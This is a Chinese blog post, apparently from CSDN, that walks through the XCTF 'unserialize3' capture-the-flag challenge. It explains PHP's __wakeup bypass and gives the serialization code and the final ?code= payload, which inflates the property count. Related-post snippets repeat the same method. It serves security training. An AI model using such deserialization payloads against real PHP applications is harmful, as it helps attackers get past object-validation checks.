PHP反序列化-unserialize3(攻防世界)

最新推荐文章于 2024-04-05 17:25:20 发布
最新推荐文章于 2024-04-05 17:25:20 发布
阅读量624 收藏
点赞数
分类专栏: CTF 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Curry197/article/details/125071112
版权

题目:

class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
?code=

解题思路:

wakeup()函数是在对象被反序列化之后被调用

但是这题如果这个函数被调用,那么程序就退出了,所以需要想办法绕过这个函数。

绕过wakeup函数执行

wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这算是一个绕过点

只要序列化的中的成员数大于实际成员数,即可绕过

new一个实例并将其序列化

<?php
class xctf
{
    public $flag = '111';

    public function __wakeup()
    {
        exit('bad requests');
    }
}

$a = new xctf();
echo serialize($a);

?>

结果:

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

上面的1代表的是对象里的参数值数,将其修改大于一即可

?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}

 

Curry197
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 463
题目 — unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
攻防世界反序列化 Web_php_unserialize
zxnimud5的专栏
09-14 496
<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { .
XCTF靶场实战(1)
weixin_51339377的博客
03-29 1241
新手练习区 1 禁用js 2 robots.txt在网站根目录 里面可以规定搜索引擎看或者不看什么内容 3 xxxx.txt.bak index.phpsxxxx.rar.zip.7z.tar.gz.bak.txt.swp github www.xxx.com/.git/config 苹果电脑 .DS_Store 文件/目录泄露 svn文件泄露 subversion,开源代码控制系统 www.xxx.com/.svn/entires ...
攻防世界 WEB刷题
weixin_73055648的博客
07-11 438
攻防世界web刷题
攻防世界——web——unserialize3反序列化
最新发布
m0_75007575的博客
04-05 335
一、序列化 将对象的状态信息转换为可以存储或传输的形式的过程,简单来说,就是将对象转化为字节序列的过程 二、反序列 把字节序列恢复为对象的过程称为对象反序列
攻防世界刷题unserialize3、favorite_number、cat
姜小孩的博客
04-26 1772
攻防世界刷题 攻防世界unserialize3 攻防世界favorite_number 攻防世界cat
学习笔记 | PHP反序列化漏洞
m0_57133419的博客
08-11 175
其中wakeup()函数漏洞原理是类对象属性个数超过实际个数,也就是其中的类名称后面跟的数字就是属性,修改为2时,不执行wakeup函数。就不会输出bad request,如果用没修改过的序列化语句就会输出bad request。看到wakeup函数,先构造序列化语句输出。攻防世界unserialize3
攻防世界 Web_php_unserialize 反序列化
trytowritecode的博客
10-24 346
昨天帮忙打了场比赛,web题目里也是有反序列化的题,也是利用魔术方法的调用来构造pop链,获取flag但那道题好绕我不会写,然后还有关于json的题,就发现自己好多都没学,真的打一场比赛容易把自己人都打傻掉。 这道题也是看了好久才明白的题目。 废话不多直接上代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file =
攻防世界unserialize3
m0_73303597的博客
11-06 1915
好难啊
序列化与反序列化--攻防世界unserialize3
qq_53755216的博客
03-16 198
对象序列化 O代表object(若是A,则代表数组) 7代表对象名字占7个字符 3 代表三个参数 s -> string i -> int serialize 序列化 unserialize 反序列化 补充知识 __sleep() 和 __wakeup(): __sleep() 方法常用于提交未提交的数据,或类似的清理操作。同时,如果有一些很大的对象,但不需要全部保存,这个功能就很好用。 与之相反,unserialize() 会检查是否存在一个 __wakeup() 方法。如果存在,则会
unserialize:PHP 反序列化的 Node.js 端口
05-29
PHP 反序列化的 Node.js 端口 安装 npm install unserialize 用法 var unserialize = require('unserialize'); console.log(unserialize('a:2:{s:4:"name";s:4:"Andy";s:3:"age";i:82;}')); // { name: 'Andy', ...
PHP常见的序列化与反序列化操作实例分析
10-16
主要介绍了PHP常见的序列化与反序列化操作,结合实例形式分析了php使用serialize()及unserialize()进行序列化与反序列化相关操作技巧及注意事项,需要的朋友可以参考下
php中序列化与反序列化详解
01-20
unserialize() 恢复原先变量 eg: $stooges = array('Moe','Larry','Curly'); $new = serialize($stooges); print_r($new);echo ; print_r(unserialize($new)); 结果:a:3:{i:0;s:3:”Moe”;i:1;s:5:”Larry”;i...
详解PHP序列化反序列化的方法
12-19
php 将数据序列化和反序列化其实就用到两个函数,serialize 和unserialize。 serialize 将数组格式化成有序的字符串 unserialize 将数组还原成数组 例如: $user=array('Moe','Larry','Curly'); $user=serialize($...
PHP 序列化和反序列化函数实例详解
12-20
序列化与反序列化 把复杂的数据类型压缩到一个字符串中 serialize() 把变量和它们的值编码成文本形式 unserialize() 恢复原先变量  1.创建一个$arr数组用于储存用户基本信息,并在浏览器中输出查看结果; $arr=...
反序列化--攻防世界例题
qq_55992895的博客
07-09 323
反序列化
攻防世界 unserialize3
weixin_52268949的博客
01-28 1433
unserialize3 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } ?code= 进入题目给出部分代码,注意发现到有个wakeup()函数,我们要想办法绕过这个函数,wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这也算是一个绕过点 我们编写exp class xctf { public $flag = '
攻防世界unserialize3 ---------- 反序列化
weixin_44632787的博客
07-24 385
攻防世界unserialize3 ---------- 反序列化 打开页面,果然。。。而且看起来挺简单的! class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 所以开始构造payload:O:4:"xctf":1:{s:4:"flag";s:3:"111";}但是这里还有个小问题… 如果直接用上面那个payload你会发现它被拦下。原因是__wakeup()这个函数 p

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值